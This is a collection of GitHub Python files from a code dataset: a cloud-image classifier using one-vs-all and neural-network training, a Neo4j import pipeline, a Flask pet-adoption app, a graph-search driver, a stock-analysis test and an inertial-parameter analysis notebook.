tqdm(range(sample_size*num_labels)):\n array = np.load(files[t//num_labels])\n array[array != (t+1)%num_labels] = 0\n array[array == (t+1)%num_labels] = 1\n array_pca = pca_array(slice_array(array), k_main_components)[0]\n X[t, :] = array_pca.flatten()\n \n p = ML.predictOneVsAll(trained_theta[:,1:], X)\n \n for k in range(num_labels):\n success_of_label_k = 0\n for t in range(k, sample_size*num_labels, num_labels):\n if p[t] == k%num_labels:\n success_of_label_k+=1\n success_of_label_k = success_of_label_k / sample_size\n print(\"Success of label\", k, \"is : \", success_of_label_k*100, \"%\")\n return p\n\n\ndef plot_OneVsAll_testDataset(path_in, trained_theta, p, sample_size=30, subplot_size=3, num_labels=13):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".nc\")]\n \n len_subplot = subplot_size**2\n \n fig, ax = plt.subplots(subplot_size, subplot_size)\n fig.subplots_adjust(hspace=0.5)\n for t in tqdm(range(len_subplot)):\n array = xr.open_dataset(files[t//num_labels])['data'].values[t//num_labels, t%num_labels, :, :]\n \n try:\n plt.subplot(subplot_size, subplot_size, t+1)\n plt.imshow(array)\n plt.title(f\"Real label is : {t%num_labels} \\n Predicted label is : {p[t]}\")\n except:\n break\n \n plt.savefig(abs_path+f\"/OneVsAll_2017_k10.png\")\n\n return None\n\n# %% 1VSALL ARRAYS K=10\npath_in_arrays_pca = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k10\"\n#If dataset is PCA, data variable is '__xarray_dataarray_variable__', 'data' otherwise\nvariable = \"__xarray_dataarray_variable__\"\n\ntrained_theta_arrays, X_arrays, y_arrays = OneVsAll_dataset(path_in_arrays_pca, variable, sample_size=324,\n lambda_=1, num_labels=13, itterations=30)\n\nnp.save(abs_path+\"/trained_theta_k20_itt30_sample324.npy\", trained_theta_arrays)\n\n\n# %% 1VSALL ARRAYS K=20\npath_in_arrays_pca = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k10\"\n#If dataset is PCA, data variable is '__xarray_dataarray_variable__', 'data' otherwise\nvariable = \"__xarray_dataarray_variable__\"\n\ntrained_theta_arrays, X_arrays, y_arrays = OneVsAll_dataset(path_in_arrays_pca, variable, sample_size=324,\n lambda_=1, num_labels=13, itterations=30)\n\np_arrays = OneVsAll_testDataset_pca(path_in_arrays_pca, trained_theta_arrays, variable,\n sample_size=1, num_labels=13)\n\nplot_OneVsAll_testDataset(path_in_arrays_pca, trained_theta_arrays, p_arrays, variable, \n sample_size=30, subplot_size= 6, num_labels=13)\n\n# %%\n\"\"\"\nNew choices had to be made : even when reducing PCA to 10 main components vectors, the output array\nsize is 728*10=7280 \"pixels\" to study, which way too long for scipy.optimize.minimize.\nEven when sampling ony the first month, the learning matrix was 360*7280.\nThus, we had a new idea : to first reduce the images size before computing both the learning \nalgorithm and the PCA of the data.\nThus, for 10 main components, thetas calculation was ~16min, and 1h10min for k=20.\nIn any way, we still mainly hope for the to-be-done neural network to converge more quickly and be\nable to handle all the data\n\nPS : array slicing gave bad results on the convoluted border dataset. Convolution product should \nbe done over the newly sliced data.\nPS2 : tol in scipy.optimize.minimize was set to 10e-3 instead of the default 10e-8 considering \nthe values of the arrays being aroung 10e1\n\"\"\"\n\n# %%\n#================ 2b - OneVsAll ALGORITHM TESTING ================#\n\n# %% TESTING K=10 2017 (TRAINED)\ntrained_theta_arrays = np.load(abs_path+\"/trained_theta_k10_itt30_sample324.npy\")\npath_in_arrays_pca = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k10\"\nvariable = \"__xarray_dataarray_variable__\"\n\np_arrays = OneVsAll_testDataset_pca(path_in_arrays_pca, trained_theta_arrays, variable,\n sample_size=324, num_labels=13)\n\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train\"\n\nplot_OneVsAll_testDataset(path_in_arrays, trained_theta_arrays, p_arrays, \n sample_size=324, subplot_size=4, num_labels=13)\n\n# %% TESTING K=20 2017 (TRAINED)\ntrained_theta_arrays = np.load(abs_path+\"/trained_theta_k20_itt30_sample324.npy\")\npath_in_arrays_pca = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k20\"\nvariable = \"__xarray_dataarray_variable__\"\n\np_arrays = OneVsAll_testDataset_pca(path_in_arrays_pca, trained_theta_arrays, variable,\n sample_size=324, num_labels=13)\n\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train\"\n\nplot_OneVsAll_testDataset(path_in_arrays, trained_theta_arrays, p_arrays, \n sample_size=324, subplot_size=4, num_labels=13)\n\n# %% TESTING K=10 2018 (TEST)\ntrained_theta_arrays = np.load(abs_path+\"/trained_theta_k10_itt30_sample324.npy\")\npath_in_arrays_2018 = abs_path+\"/The cloud dataset/2018M10\"\nvariable = \"__xarray_dataarray_variable__\"\n\np_arrays = OneVsAll_testArray(path_in_arrays_2018, trained_theta_arrays, variable,\n sample_size=1000, num_labels=13, k_main_components=10)\n\n# %% TESTING K=20 2018 (TEST)\ntrained_theta_arrays = np.load(abs_path+\"/trained_theta_k20_itt30_sample324.npy\")\npath_in_arrays_2018 = abs_path+\"/The cloud dataset/2018M11\"\nvariable = \"__xarray_dataarray_variable__\"\n\np_arrays = OneVsAll_testArray(path_in_arrays_2018, trained_theta_arrays, variable,\n sample_size=500, num_labels=13, k_main_components=20)\n\n# %%\n\"\"\"\nTesting over the whole 2017 folder :\nWhen testing with k=20 over the learning dataset, results are excellent exepted for 3 categories :\nlabels 2, 3 and 8. This tremendous lack of performance comes from a lack of data, as occurences of \nthose labels are very rare. They then should be removed from the learning examples, or be trained on \na dedicated dataset, with more examples (most of the arrays are null)\n\nPS : error calculation is sometimes slightly above 100%, depending on the rounding of the size of the folder\n\nTesting over the whole January 2018 folder :\nWhen testing with k=10 and k=20 over testing dataset, results are overwhelmingly disapointing.\nActually, it recognizes consistantly some labels but doesn't attribute it the right value. \n(eg : label 4 is always recognised as 0)\nThe testing has to be realised over larger sets to confirm the biaises. If confirmed, then the finesse\nof the algorithm should be reduced, to help breaking those biaises.\n\n\nTesting over the whole 2018 folder :\nBiaises seems to be the same. Leet's keep going by woorking on the neural network before coming back\nhere to merge some categories. \n\"\"\"\n\n# %%\n#================ 3 - NEURAL NETWORK ================#\n\n# %%\n\ndef run_datasetNN(path_in, variable=\"__xarray_dataarray_variable__\", sample_size=100, hidden_layer_size=32, num_labels=13, itterations=100):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".nc\")]\n \n #To check the length of a vector of an image (may change depending on the PCA)\n data_info = xr.open_dataset(files[0])[variable].values\n len_data = data_info.shape[-1]\n len_data_daily = data_info.shape[-2]\n \n X, y = data_toarray_selection(path_in, variable, sample_size, num_labels)\n \n Theta1, Theta2 = ML.nnOneLayer(X, y, hidden_layer_size, num_labels, itterations)\n \n return Theta1, Theta2\n\n\ndef test_datasetNN(path_in, Theta1, Theta2, sample_size=100, num_labels=13):\n \n X, y = data_toarray_selection(path_in, variable, sample_size, num_labels)\n p_arrays = ML.predOneLayer(X, Theta1, Theta2)\n \n len_sample, len_data = X.shape\n print(X.shape)\n \n for k in range(num_labels):\n success_of_label_k = 0\n for t in range(k, len_sample, num_labels):\n if p_arrays[t] == k:\n success_of_label_k+=1\n success_of_label_k = trunc(success_of_label_k/(len_sample/num_labels)*10000)\n print(\"Success of label\", k, \"is : \", success_of_label_k/100, \"%\")\n\n return p_arrays\n\n\ndef test_arrayNN(path_in, Theta1, Theta2, k_main_components=10, sample_size=100, num_labels=13):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".npy\")]\n size_array_pca = np.load(files[0]).shape[0]*k_main_components\n \n X = np.zeros((sample_size*num_labels, size_array_pca//6))\n for t in tqdm(range(sample_size*num_labels)):\n array = np.load(files[t//num_labels])\n array[array != (t+1)%num_labels] = 0\n array[array == (t+1)%num_labels] = 1\n array_pca = pca_array(slice_array(array), k_main_components)[0]\n X[t, :] = array_pca.flatten()\n \n p_arrays = ML.predOneLayer(X, Theta1, Theta2)\n\n len_sample, len_data = X.shape\n \n for k in range(num_labels):\n success_of_label_k = 0\n for t in range(k, len_sample, num_labels):\n if p_arrays[t] == k:\n success_of_label_k+=1\n success_of_label_k = trunc(success_of_label_k/(len_sample/num_labels)*10000)\n print(\"\", \"Success of label\", k, \"is : \", success_of_label_k/100, \"%\")\n\n return p_arrays, X\n\n# %%\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k10\"\nvariable = \"__xarray_dataarray_variable__\"\n\nTheta1, Theta2 = run_datasetNN(path_in_arrays, variable, sample_size=324, num_labels=13, itterations=100)\n\nnp.save(abs_path+\"/trained_NN_k10_itt100_sample324.npy\", np.array([Theta1, Theta2], dtype=object))\n\n# %%\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k20\"\nvariable = \"__xarray_dataarray_variable__\"\n\nTheta1, Theta2 = run_datasetNN(path_in_arrays, variable, sample_size=324, num_labels=13, itterations=100)\n\nnp.save(abs_path+\"/trained_NN_k20_itt100_sample324.npy\", np.array([Theta1, Theta2], dtype=object))\n\n# %%\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k30\"\nvariable = \"__xarray_dataarray_variable__\"\n\nTheta1, Theta2 = run_datasetNN(path_in_arrays, variable, sample_size=324, num_labels=13, itterations=100)\n\nnp.save(abs_path+\"/trained_NN_k30_itt100_sample324.npy\", np.array([Theta1, Theta2], dtype=object))\n\n# %%\n#================ 3b - NEURAL NETWORK TESTING ================#\n\n# %% TESTING K=10 2017 (TRAINED)\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k10\"\nvariable = \"__xarray_dataarray_variable__\"\n\nTheta1, Theta2 = np.load(abs_path+\"/trained_NN_k10_itt100_sample324.npy\", allow_pickle=True)\n\np_arrays = test_datasetNN(path_in_arrays, Theta1, Theta2, sample_size=324, num_labels=13)\n\n# %% TESTING K=20 2017 (TRAINED)\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k20\"\nvariable = \"__xarray_dataarray_variable__\"\n\nTheta1, Theta2 = np.load(abs_path+\"/trained_NN_k20_itt100_sample324.npy\", allow_pickle=True)\n\np_arrays = test_datasetNN(path_in_arrays, Theta1, Theta2, sample_size=324, num_labels=13)\n\n# %% TESTING K=30 2017 (TRAINED)\npath_in_arrays = abs_path+\"/TheCloudDataset_labelized_arrays_train_pca_k30\"\nvariable = \"__xarray_dataarray_variable__\"\n\nTheta1, Theta2 = np.load(abs_path+\"/trained_NN_k20_itt100_sample324.npy\", allow_pickle=True)\n\np_arrays = test_datasetNN(path_in_arrays, Theta1, Theta2, sample_size=324, num_labels=13)\n\n# %% TESTING K=10 2018 (TEST)\npath_in_arrays = \"D:/The cloud dataset/2018M01\"\n\nTheta1, Theta2 = np.load(\"D:/Machine Learning/Project/trained_NN_k10_itt100_sample324.npy\", allow_pickle=True)\n\np_arrays, X = test_arrayNN(path_in_arrays, Theta1, Theta2, k_main_components=10, sample_size=1000, num_labels=13)\n\n# %% TESTING K=20 2018 (TEST)\npath_in_arrays = abs_path+\"/The cloud dataset/2018M01\"\n\nTheta1, Theta2 = np.load(abs_path+\"/trained_NN_k20_itt100_sample324.npy\", allow_pickle=True)\n\np_arrays = test_arrayNN(path_in_arrays, Theta1, Theta2, k_main_components=20, sample_size=1000, num_labels=13)\n\n# %%\n#================ 4 - RESULTS ANALYSIS ================#\n\n# %%\n\"\"\"\nThe results are not satisfying enough to keep going. Some labels are (kinda) working whereas others\nare fuly broken (for multiple reasons).\nThe way of improvement are as listed here :\n 1) Increasing the resolution of the PCA is not an option for the 1vsAll algorithm, as the maximum \n computation time has already been reached. Altough, larger k main components values can be computed \n for the Neural Network\n 2) Merging some labels can be planned, as clouds of a close categories are mainly flying in a pack\n (cf images 0 and 1), and can add weight to a categorie when compared to an other.\n 3) Using the borders convolution to improve the accuracy, or maybe be the only dataset to learn from.\n\"\"\"\n# %%\n#================ END OF PART II ================#\n\n# %%\n \n\n\n\n\n\n\n","repo_name":"Nayel-Blidi/GitPublic","sub_path":"Machine Learning/Project_Cloud_Dataset/P2_Project_TheCloudDataset_machine_learning.py","file_name":"P2_Project_TheCloudDataset_machine_learning.py","file_ext":"py","file_size_in_byte":23354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"24511329776","text":"import pandas as pd\nimport sqlite3 as sql\nfrom py2neo import Graph, Node, Relationship\n\nimport config\n\n\nclass NeoPipeline(object):\n\n def __init__(self):\n self.graph_path = config.GRAPH_DB['graph_path']\n self.graph = Graph(self.graph_path)\n self.sql_path = \"data/network.sqlite\"\n\n def nodes_from_sql(self, query, label, unique=\"id\"):\n \"\"\"\n INPUT: str, str, str\n OUTPUT: None\n Imports node data from sql query into neo4j\n \"\"\"\n # Extract data from sql db.\n with sql.connect(self.sql_path) as con:\n nodes = pd.read_sql(sql=query, con=con, index_col=None)\n nodes_dict = nodes.to_dict(outtype=\"records\")\n\n # Create nodes in graph.\n self.graph.schema.create_uniqueness_constraint(label, unique)\n for node in nodes_dict:\n n = Node.cast(label, node)\n self.graph.create(n)\n\n def relationships_from_sql(self, query, nodes, label, properties):\n \"\"\"\n INPUT: str, list(dict), str, dict\n OUTPUT: None\n Imports relationship data from sql query into neo4j\n \"\"\"\n with sql.connect(self.sql_path) as con:\n rels = pd.read_sql(sql=query, con=con, index_col=None)\n rels_dict = rels.to_dict(outtype=\"records\")\n\n for rel in rels_dict:\n r = Relationship.cast(self.graph.find_one(nodes[0][\"label\"], nodes[0][\"property\"], rel[nodes[0][\"sql_col\"]]),\n label,\n self.graph.find_one(nodes[1][\"label\"], nodes[1][\"property\"], rel[nodes[1][\"sql_col\"]]),\n properties)\n self.graph.create(r)\n\n def build_network(self):\n query_players = '''\n SELECT player_name AS name, player_id AS id, player_pos AS pos\n FROM individuals_subset\n GROUP BY player_id\n '''\n self.nodes_from_sql(query_players, \"Players\", unique=\"id\")\n query_coaches = '''\n SELECT coach_name AS name, coach_id AS id\n FROM individuals_subset\n GROUP BY coach_id\n '''\n self.nodes_from_sql(query_coaches, \"Coaches\", unique=\"id\")\n\n query_play_coach = '''\n SELECT *\n FROM individuals_subset\n '''\n play_coach = [{'label': \"Coach\", 'property': \"id\", 'sql_col': \"coach_id\"}, {'label': \"Player\", 'property': \"id\", 'sql_col': \"player_id\"}]\n self.relationships_from_sql(query_play_coach, nodes=play_coach, label_rel=\"COACHED\", properties={\"league\": \"NBA\"})","repo_name":"anthonywyso/network","sub_path":"pipeline_graphdb.py","file_name":"pipeline_graphdb.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"1634509981","text":"import pandas as pd\n\n# feat_file = \"data/train_feat.csv\"\n# ext_feat_file = \"data/train_ext_feat.csv\"\ndog_breeds_file = \"data/dog_breeds_ext.csv\"\n\n# load dog breed data from American Kennel Club and create dummy variables\ndog_breeds_df = pd.read_csv(dog_breeds_file)\ndog_groups_df = pd.get_dummies(dog_breeds_df['Dog_group'])\ndog_breeds_df = pd.concat([dog_breeds_df.drop('Dog_group', axis=1), dog_groups_df], axis=1)\n\nfor subset in ['train', 'test']:\n feat_file = \"data/\" + subset + \"_feat.csv\"\n ext_feat_file = \"data/\" + subset + \"_ext_feat.csv\"\n # load data\n feat_df = pd.read_csv(feat_file, parse_dates=['DateTime'], infer_datetime_format=True)\n\n # join on Breed, cat breeds will have missing values which will be dropped after\n # file is loaded\n feat_ext_df = pd.merge(left=feat_df, right=dog_breeds_df, how='left', on='Breed')\n feat_ext_df.to_csv(ext_feat_file, index=False)\n","repo_name":"vzaretsk/kaggle-animal-shelter","sub_path":"external_features.py","file_name":"external_features.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"57"} +{"seq_id":"2928475242","text":"'''Pet adoption agency app'''\n\nfrom flask import Flask, render_template, redirect, url_for, request, flash\nfrom models import db, connect_db, Pet\nfrom forms import AddPetForm, EditPetForm\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///pet_adopt_db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = True\n\nconnect_db(app)\n\nfrom flask_debugtoolbar import DebugToolbarExtension\napp.config['SECRET_KEY'] = \"SECRET!\"\ndebug = DebugToolbarExtension(app)\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n '''Show 404 page.'''\n return render_template('404.html'), 404\n\n@app.route('/')\ndef pet_list():\n '''Show list of pets available for adoption'''\n pets = Pet.query.all()\n\n return render_template('pet_list.html', pets=pets)\n\n@app.route('/add', methods=['POST', 'GET'])\ndef pet_add():\n '''Add a pet.'''\n form = AddPetForm()\n\n if form.validate_on_submit():\n name = form.name.data\n species = form.species.data\n photo_url = form.photo_url.data\n age = form.age.data\n notes = form.notes.data\n\n new_pet = Pet(name=name, species=species, photo_url=photo_url, age=age, notes=notes)\n db.session.add(new_pet)\n db.session.commit()\n\n flash(f'Added {name} the {species}!')\n\n return redirect(url_for('pet_list'))\n\n else:\n return render_template('pet_add_form.html', form=form)\n\n@app.route('/', methods=['POST', 'GET'])\ndef pet_detail(pet_id):\n '''Show pet info with form to edit pet.'''\n\n pet = Pet.query.get_or_404(pet_id)\n form = EditPetForm(obj=pet)\n\n if form.validate_on_submit():\n # pet.photo_url = form.photo_url.data\n # pet.notes = form.notes.data\n # pet.available = form.available.data\n form.populate_obj(pet)\n\n db.session.commit()\n\n return redirect(url_for('pet_list'))\n\n else:\n return render_template('pet_detail.html', pet=pet, form=form)\n\n\n","repo_name":"hall-ash/SB_Exercises","sub_path":"flask/adopt/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71278046559","text":"from functools import partial\n\nfrom Graph import Graph\nfrom Vertex import Vertex\nfrom search import breadth_first_search, depth_first_search, a_star_search, heuristic, cost\n\n\nif __name__ == \"__main__\":\n a = Vertex('a')\n b = Vertex('b')\n c = Vertex('ç')\n d = Vertex('d')\n e = Vertex('e')\n\n g = Graph()\n g.addVertex(a)\n g.addVertex(b)\n g.addVertex(c)\n g.addVertex(d)\n g.addVertex(e)\n g.addDirectedEdge(a, c)\n g.addDirectedEdge(a, d)\n g.addDirectedEdge(a, b)\n g.addDirectedEdge(c, d)\n g.addDirectedEdge(b, d)\n g.addDirectedEdge(d, e)\n g.addDirectedEdge(b, e)\n\n path_d = depth_first_search(g.vertices[-1], g)\n print(list(map(lambda n: n.value, path_d)))\n path_b = breadth_first_search(g.vertices[-1], g)\n print(list(map(lambda n: n.value, path_b)))\n# path_vals = list(map(lambda n: n.value, path))\n# print(path_vals)\n\n# h = heuristic(\"Mombasa\")\n# nr_dists = cost(\"Nairobi\")\n\n\n# nrb_dists = cost(\"Nairobi\")\n# print(nrb_dists(\"Kisumu\"))\n# print(nrb_dists(\"Kisumu\"))\n\n # levels = BFS(g.vertices[0], g)\n # for i in range(len(levels)):\n # print(\"Level\", i, \":\")\n # for j in levels[i]:\n # print(\"\\t\", j)\n","repo_name":"JerryNyoike/GraphSearchAlgos","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32205442583","text":"import unittest\nfrom io import StringIO\nfrom unittest.mock import Mock, patch\n\nfrom analysis_printer import AnalysisPrinter\nfrom symbol_data import SymbolData\n\nSYMBOL = \"FOO\"\nOVERVIEW = {\"MarketCapitalization\": 30000000001}\nBALANCE_SHEET = {\n \"quarterlyReports\": [{\"totalCurrentAssets\": 2000, \"totalCurrentLiabilities\": 1000}]\n}\nEARNINGS = {\n \"annualEarnings\": [{\"reportedEPS\": 1.33}] * 3 + [{\"reportedEPS\": 1.0}] * 7,\n \"quarterlyEarnings\": [{\"reportedEPS\": 1.0}] * 12,\n}\nQUOTE = {\n \"Global Quote\": {\"05. price\": \"60.00\"},\n}\nFOO_SYMBOL_DATA = SymbolData(\n SYMBOL,\n OVERVIEW,\n BALANCE_SHEET,\n EARNINGS,\n QUOTE,\n time_series_monthly_adjusted=None,\n)\n\n\nclass TestAnalyze(unittest.TestCase):\n @patch(\"sys.stdout\", new_callable=StringIO)\n def test_print_buy_recommendation(self, mock_stdout):\n printer = AnalysisPrinter(FOO_SYMBOL_DATA)\n printer.recommender.recommendation = Mock(return_value=True)\n expected_message = \"\"\"====== RECOMMENDATION ======\nThe recommendation for FOO is True\n\"\"\"\n printer.print_recommendation()\n self.assertEqual(expected_message, mock_stdout.getvalue())\n\n @patch(\"sys.stdout\", new_callable=StringIO)\n def test_print_sell_recommendation(self, mock_stdout):\n printer = AnalysisPrinter(FOO_SYMBOL_DATA)\n printer.recommender.recommendation = Mock(return_value=False)\n expected_message = \"\"\"====== RECOMMENDATION ======\nThe recommendation for FOO is False\n\"\"\"\n printer.print_recommendation()\n self.assertEqual(expected_message, mock_stdout.getvalue())\n\n @patch(\"sys.stdout\", new_callable=StringIO)\n def test_print_sell_recommendation(self, mock_stdout):\n printer = AnalysisPrinter(FOO_SYMBOL_DATA)\n printer.recommender.recommendation = Mock(return_value=False)\n expected_message = \"\"\"====== RECOMMENDATION ======\nThe recommendation for FOO is False\n\"\"\"\n printer.print_recommendation()\n self.assertEqual(expected_message, mock_stdout.getvalue())\n","repo_name":"devskii/stocks-python","sub_path":"analysis_printer_test.py","file_name":"analysis_printer_test.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"30550635241","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# # Analyzing inertial parameter estimation in simulation\r\n# ## Read Text file and make variables\r\n\r\n# In[36]:\r\n\r\n\r\n#!/usr/bin/env python3\r\n\r\n# read text files\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport sys\r\nfrom scipy import signal, fftpack\r\nfrom scipy.signal import savgol_filter\r\nget_ipython().run_line_magic('matplotlib', 'inline')\r\nlogging_freq = 800\r\n# enter data file here\r\n\r\ndata_file = \"data_file_04-14-19_02-16-16\"\r\n# info about data_file_03-14-19_12-55-13\r\n# RLS controller drawing circles\r\n# correct estimation m,com, wrong inertia\r\n# gravity included\r\n\r\n# info about data_file_03-14-19_15-17-59\r\n# Trajectory testing with sin yaxis\r\n# gravity included\r\n# wrong estimation m,com,inertia T\r\n\r\n# info about data_file_03-14-19_15-21-49\r\n# RLS controller with sin yaxis\r\n# gravity removed\r\n# right estimation m, wrong com,inertia\r\n\r\n# info about data_file_03-14-19_16-12-11\r\n# RLS controller with sin yaxis + move up and down\r\n# gravity removed\r\n# right estimation m,com wrong inertia\r\n\r\n# info about data_file_03-14-19_20-57-06\r\n# estimation controller with sin yaxis + move up and down\r\n# gravity removed\r\n# right estimation m,com wrong inertia\r\n\r\n\r\npath = \"/Users/elenakern/university/masters/sai-2/apps/inertial_parameter_application/data_collection/simulation/inertial_params_est/\"\r\n\r\n# path = \"/home/elenakern/Codes/sai2.0/applications/data_collection/simulation/inertial_params_est/\"\r\npath_data_file = path + data_file\r\n\r\nfile = np.loadtxt(path_data_file,skiprows=1)\r\n\r\npos = file[0::,0:3] #position (end-effector in last link frame)\r\nvel = file[0::,3:6] #linear velocity (end-effector in last link frame)\r\naccel = file[0::,6:9] #linear acceleration (end-effector in last link frame)\r\navel = file[0::,9:12] #angular velocity (end-effector in last link frame)\r\naaccel = file[0::,12:15] #angular acceleration (end-effector in last link frame)\r\nforce_virtual = file[0::,15:18] #virtual force simulation\r\ntorque_virtual = file[0::,18:21] #virtual torque simulation\r\nphi_RLS = file[0::,21:31] #inertial parameters RLS\r\ngravity = file [0::, 31:34]\r\naccel_sim = file[0::, 34:37]\r\navel_sim = file [0::, 37:40]\r\naaccel_sim = file [0::, 40:43]\r\ngravity_ = file [0::, 43:46]\r\n\r\n\r\n# phi_LS = file[0::,35:45] #inertial parameters LS\r\n# phi_debug = file[0::,45:55] #inertial parameters direct functs\r\n\r\n\r\n#files until data_file_03-14-19_20-57-06\r\n# accel = file[0::,0:3] #linear acceleration (end-effector in last link frame)\r\n# avel = file[0::,3:6] #angular velocity (end-effector in last link frame)\r\n# aaccel = file[0::,6:9] #angular acceleration (end-effector in last link frame)\r\n# g_local = file[0::,9:12] #gravity vector (end-effector in last link frame)\r\n# force_virtual = file[0::,12:15] #virtual force simulation\r\n# torque_virtual = file[0::,15:18] #virtual torque simulation\r\n# phi = file[0::,18:28] #inertial parameters\r\n# mass = file[0::,18:19] #estimated mass\r\n# center_of_mass = file[0::,19:22] #estimated center of mass\r\n# inertial_tensor = file[0::,22:28] #estimated inertia tensor\r\n\r\ntime = np.arange(np.size(accel[:,0]))\r\ntime = time/800\r\n\r\n\r\n\r\n\r\nphi_aux = phi_RLS\r\nphi_aux[:,1] /= phi_aux[:,0]\r\nphi_aux[:,2] /= phi_aux[:,0]\r\nphi_aux[:,3] /= phi_aux[:,0]\r\n\r\nprint(np.shape(phi_RLS[:,0]))\r\nprint(np.size(phi_RLS[:,0]))\r\n\r\naux = np.ones(np.shape(phi_RLS[:,0]))\r\nmse_1 = np.empty_like(phi_RLS)\r\nmse_2 = np.empty_like(phi_RLS)\r\nmse_1[:,0] = (np.square(phi_RLS[:,0] - 2.0*aux)).mean(axis=0)\r\nprint(mse_1[:,0])\r\nmse_1[0,0] = (np.square(phi_RLS[0,0] - 2.0)).mean(axis=None)\r\nprint(mse_1[:,0])\r\nprint(np.square(phi_RLS[0,0]-2.0).mean())\r\n\r\nreal_values = np.array([2.0,0.02, 0.03, 0.2, 0.5, 0.0,0.0,0.5,0.0,0.5])\r\nfor idx,value in enumerate(real_values): #for all 10 inertial params \r\n for i in np.arange(np.size(phi_RLS[:,0])): #elementwise \r\n mse_2[i,idx] = (np.square(phi_RLS[i,idx] - value)).mean(axis=None) #mean squared error\r\nprint(mse_2[:,0])\r\n\r\nprint(phi_RLS[:,0])\r\n\r\n\r\n# In[37]:\r\n\r\n\r\nderivatives = np.zeros(file.shape)\r\nderivatives[1:,:]=file[1:]-file[:-1]\r\nderivatives[0]=derivatives[1]\r\n\r\n\r\n# In[35]:\r\n\r\n\r\npos_dot = derivatives[0::,0:3]*logging_freq #position (end-effector in last link frame)\r\nvel_dot = derivatives[0::,3:6]*logging_freq #linear velocity (end-effector in last link frame)\r\naccel_dot = derivatives[0::,6:9]*logging_freq #linear acceleration (end-effector in last link frame)\r\navel_dot = derivatives[0::,9:12]*logging_freq #angular velocity (end-effector in last link frame)\r\naaccel_dot = derivatives[0::,12:15]*logging_freq \r\n\r\naccel_sim_dot= derivatives[0::, 34:37]*logging_freq \r\navel_sim_dot = derivatives [0::, 37:40]*logging_freq \r\naaccel_sim_dot = derivatives [0::, 40:43]*logging_freq \r\n\r\n\r\n# ## Plotting functions\r\n# ### TUM colors\r\n\r\n# In[3]:\r\n\r\n\r\n#TUM colors rgb\r\nblue = (0,0.3961,0.7412)\r\nred = (0.7686,0.0275,0.1059)\r\ngreen =(0,0.4863,0.1882)\r\norange = (0.8902, 0.4471, 0.1333)\r\npurple = (0.4118, 0.0314, 0.3529)\r\ngrey = (0.6118, 0.6157, 0.6235)\r\nyellow = (0.9765, 0.7294, 0)\r\ncolor_list = [blue, red, green, orange, grey, purple, yellow]\r\n\r\n\r\n# ### Function definitions\r\n\r\n# In[4]:\r\n\r\n\r\ndef Plot_three_dim(time, data, ylabel, title, subtitle):\r\n f, axarr = plt.subplots(3,1,figsize=(7,9))\r\n f.suptitle(title, fontsize=20)\r\n coordinates = [\"$_x$\",\"$_y$\",\"$_z$\"]\r\n for idx,coordinate in enumerate(coordinates):\r\n axarr[idx].plot(time, data[:,idx], c=blue)\r\n axarr[idx].set_title(subtitle+str(coordinate))\r\n axarr[idx].set_xlim([0, time[-1]])\r\n axarr[idx].set_ylabel(ylabel)\r\n axarr[2].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in f.axes[:-1]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_intertial_params_one(time, data,estimation_approach):\r\n f, axarr = plt.subplots(10,1,figsize=(6,15))\r\n f.suptitle(\"Inertial Parameter Estimation \" + estimation_approach, fontsize=20)\r\n params = ['Mass in $kg$', 'COM_x in $m$','COM_y in $m$', 'COM_z in $m$', '$I_{xx}$','$I_{xy}$', '$I_{xz}$','$I_{yy}$','$I_{yz}$','$I_{zz}$']\r\n data[:,1] /= data[:,0]\r\n data[:,2] /= data[:,0]\r\n data[:,3] /= data[:,0]\r\n for idx, param in enumerate(params):\r\n axarr[idx].plot(time, data[:,idx], c=blue)\r\n axarr[idx].set_title(param)\r\n axarr[idx].set_xlim([0, time[-1]])\r\n axarr[9].set_xlabel(\"Elapsed time in $s$\")\r\n plt.setp([a.get_xticklabels() for a in f.axes[:-1]], visible=False)\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.9)\r\n \r\ndef Plot_intertial_params_one_error(time, data,estimation_approach, m, com_x, com_y, com_z, I_xx, I_xy,I_xz, I_yy, I_yz, I_zz):\r\n f, axarr = plt.subplots(10,1,figsize=(6,15))\r\n f.suptitle(\"Inertial Parameter Estimation error \" + estimation_approach, fontsize=20)\r\n params = ['Mass in $kg$', 'COM_x in $m$','COM_y in $m$', 'COM_z in $m$', '$I_{xx}$','$I_{xy}$', 